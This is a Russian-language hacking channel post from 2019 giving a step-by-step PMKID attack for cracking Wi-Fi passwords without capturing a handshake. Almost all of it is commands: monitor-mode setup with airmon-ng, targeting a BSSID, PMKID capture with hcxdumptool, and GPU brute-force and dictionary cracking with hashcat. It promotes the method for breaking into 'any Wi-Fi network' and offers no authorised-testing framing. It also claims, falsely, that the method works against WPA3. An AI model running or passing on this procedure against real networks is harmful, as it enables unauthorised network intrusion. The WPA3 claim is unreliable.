March 7, 2019

Новый метод взлома Wi-Fi

Источник: t.me/hackportru

Шалом хацкеры, все мы знаем о протоколе шифрования WPA2, который используется сейчас во всех запароленных точках доступа.

Мало кто из вас знает, что пару месяцев назад Wi-Fi Alliance представил новый протокол шифрования WPA3.

Это не только большой шаг в области безопасности, но еще и новые трудности со взломом.

Пока протокол шифрования не распространился глобально, мы решили заранее решить вопрос с его взломом. И решили, друзья!

Теперь внимание - наш метод работает не только с новым WPA3 но и с распространенным повсеместно WPA2.

Способ будет актуален для взлома любой сети Wi-Fi прямо здесь и сейчас, а так же на долгое будущее.

Важное преимущество - нам не нужно перехватывать рукопожатие, а соответственно не нужно ждать, пока кто-то подключится к точке.

Приступим:

Все действия статьи буду выполнятся в Debian

Подготовка

Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):

1. airmon-ng + airodump-ng http://aircrack-ng.org/

2. hcxdumptool https://github.com/ZerBea/hcxdumptool

3. hcxpcaptool https://github.com/ZerBea/hcxtools

4. hashcat https://hashcat.net/hashcat/

Продолжаем:

  • Первым делом запустим нашу карту в режим монитора.
sudo airmon-ng start wlan0

Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig (для меня это wlan0).

  • Далее начинаем захват пакетов с помощью утилиты airodump.
sudo airodump-ng wlan0mon

(wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.)

Видим следующее:

  • Из списка выбираем более или менее устойчивый.

Далее сохраняем его BSSID

echo "98DED0EF7060" > filter.txt
Обратите внимание что BSSID мы записываем без ":"

Теперь переходим к самому главному, друзья!

  • Первым шагом мы должны получить pmkid точки. Делается это так:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2

Если вам интересны значения ключей, то вы можете почитать набрав hcxdumptool -h.

Основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.

После того как ввели команду видим примерно следующее:

Как только увидим надпись

[FOUND PMKID]

Жмем CTRL + C и приступаем к расшифровке.

  • Приведем наш pmkid в удобочитаемый вид для hashcat
sudo hcxpcaptool -z hashtocrack hash
  • Если набрать
cat hashtocrack
  • То получим примерно следующее

ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224

  • Далее заряжаем наш Hascat

Мы будем перебирать пароли, состоящие из 8 символов (Брут).

Сделаем мы это следующей командой:

sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force

'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat

  • Команда для перебора по словарю
sudo hashcat -m 16800 hashtocrack wordlist.txt --force


У нас hashcat производит брут с использованием GPU (видеокарты), по маске из 8 цифр (это 10кк паролей), перебирает чуть меньше часа. По словарям тоже очень быстро работает.

КАНАЛ: t.me/hackportru - ПОДПИШИСЬ

САЙТ: http://hack-port.ru